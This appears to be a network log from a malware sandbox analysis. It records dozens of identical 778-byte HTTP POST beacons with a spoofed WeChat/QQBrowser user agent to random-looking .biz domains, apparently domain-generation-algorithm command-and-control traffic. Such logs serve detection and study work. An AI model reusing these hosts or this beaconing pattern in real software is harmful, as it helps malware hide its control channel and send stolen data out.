Source: global trafficHTTP traffic detected: POST /hogxps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /suoyjqbsciv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /uuoiubsg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dnirvyhujqwqnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tkrvouqomflftlqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /bdrtsxy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /len HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ubaevhdsrbjcmaql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yeb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /kb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ofmvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ckdrshko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qearwetpmwvhvwhi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pubppqcmfqvto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /hrtvnxyfpkjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /swl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oekfiuj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /inljiti HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /afgoll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dovasmbpdb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /arqypullvoovtl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qtybvvfgdyqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /bdnjndwcxvdfjwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /krccyasm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tlre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ewf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vdqmhlkrsphqhe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yqjotihouwfthlkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oukjvuscvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ohp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ava HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /xmqlmgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /os HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rwiegx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vrhdofwiluexay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oomorpsdyukh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /og HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qmncq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /iboogqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pcwhdleqsuu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /xcibcauw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /assjekuls HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /isekcf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /gneewdogqwseu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /onpfurgnxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /roauatfpewvsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /aixrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /moaxleedvt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /sspabsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qrtkifykhcnq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /sduodvbdxsrqja HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /guistk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /taltetnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /yasnhmosjfaqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oogcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cftycvbqsjsfc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /klbxxtxcjep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /srbpajvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
